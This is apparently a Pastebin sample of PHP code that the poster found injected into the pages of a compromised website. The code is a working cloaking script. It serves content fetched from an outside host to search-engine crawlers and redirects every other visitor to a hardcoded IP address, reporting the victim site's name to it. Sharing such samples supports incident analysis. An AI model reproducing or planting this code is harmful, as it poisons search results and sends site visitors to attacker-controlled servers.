Advertisement
imadsani

hacked2

Jan 14th, 2015
293
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.07 KB | None | 0 0
  1. #Site compromised with several pages with similar content as below
  2. #index.php
  3.  
  4. <?php $user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
  5.                                '#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
  6.                                '#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
  7.                                '#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
  8.                                '#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
  9.                                '#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
  10.                                '#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
  11.                                '#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
  12.                                '#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
  13.                                '#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
  14.                                '#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
  15.                                '#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
  16.                                '#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
  17.                                '#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
  18.                                '#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
  19.                                '#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
  20.                                '#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
  21.                                '#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
  22.  
  23. if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
  24.     $isbot = 1;
  25.     }
  26.  
  27. if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
  28. {
  29.     $isbot = 1;
  30. }
  31.  
  32. if ($isbot)
  33. {
  34.  
  35. $url = "http://20150109c.fefnjefb.in/uqmwsfsobtvtcxnvmudcsaoe";
  36. $options = array(
  37.   'http'=>array(
  38.     'method'=>"GET",
  39.     'header'=>"Accept-language: en\r\n" .
  40.               "Cookie: foo=bar\r\n" .  // check function.stream-context-create on php.net
  41.               "User-Agent: ".$_SERVER['HTTP_USER_AGENT']."\r\n" // i.e. An iPad
  42.   )
  43. );
  44. $context = stream_context_create($options);
  45. $html = file_get_contents($url, false, $context);
  46. echo $html;
  47. }
  48.  
  49. if(!@$isbot)
  50. {
  51. //
  52.  
  53. $s = dirname($_SERVER['PHP_SELF']);
  54. if ($s == '\\' | $s == '/') {$s = ('');}  
  55. $s = $_SERVER['SERVER_NAME'] . $s;
  56.  
  57. header("Location: http://173.236.65.24/input/?mark=20150109-$s");
  58. //header("Location: http://20150109c.fefnjefb.in/uqmwsfsobtvtcxnvmudcsaoe");
  59. exit;
  60. }
  61.  
  62. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement